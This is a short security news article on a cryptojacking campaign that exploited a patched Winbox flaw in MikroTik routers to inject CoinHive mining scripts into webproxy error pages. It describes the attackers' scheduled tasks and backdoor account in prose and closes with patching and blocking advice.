Cryptomining hack on ISP grade routers found
An attack has been uncovered, compromising thousands of MikroTik routers to embed Coinhive cryptomining scripts in websites using a known vulnerability. Researchers have reported more than 170,000 active MikroTik devices infected with the CoinHive site-key used in this attack. In half a day, an additional 15,000 routers were found to be affected. The attack is mainly targeting Brazil but infections are growing internationally. MikroTik routers are used in large enterprises and by ISPs to serve web pages to thousands of users daily, meaning that each compromise translates into a big payday for the hackers.
The hackers are going straight to carrier grade routers and by passing small sites and infecting individual computers. While cryptomining is the main goal of the attacks, the script has persistence and the flexibility to change and add new features, increasing the threat. The attacks shows the dangers of not keeping up to date with security patchs. It takes advantage of a known vulnerability in the routers, which was patched by MikroTik on April 23rd. The hack targets Winbox and allows the hacker to gain unauthenticated remote administrative access to any vulnerable MikroTik router.
Instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the hacker uses the device's functionality in order to inject the CoinHive script into every web page that a user visits. Researcher noted that many of the compromised pages are actually error pages of the webproxy, meaning that the hacker created a custom error page with the CoinHive script in it. When a user receives an error page of any kind while web browsing, they will get a custom error page which will mine CoinHive for the hacker. What this means is that this affects not only users who are not directly connected to the infected router's network, but also users who visit websites behind these infected routers. The attack works in both directions.
Some the commands that are executed when a router is infected is the creation of scheduled tasks for updating if and when needed. It creates a scheduled task which connects to another host and fetches a new "error.html" file, in case the site key was blocked and had to be replaced with another. The hacker also creates a scheduled task which downloads and executes a script written for MikroTik routers named "u113.rsc." A backdoor account named "ftu" is also created. When researchers looked into the script, it was just being used as a placeholder, but it's a way for the hacker to send additional commands to all compromised devices. These updates also adds more cleanup commands to leave a smaller footprint and reduce the risk of being detected.
This is another reminder that we must keep our equipment up to date with the latest security patches. Otherwise, hackers can compromise equipment to inject cryptojacking malware. Cryptojacking can be stopped in the browser and blocked at the local firewall. To help protect against some of these threats, use https requests instead of http. Unfortunately, https is dependent on the website being viewed and users can't force the option.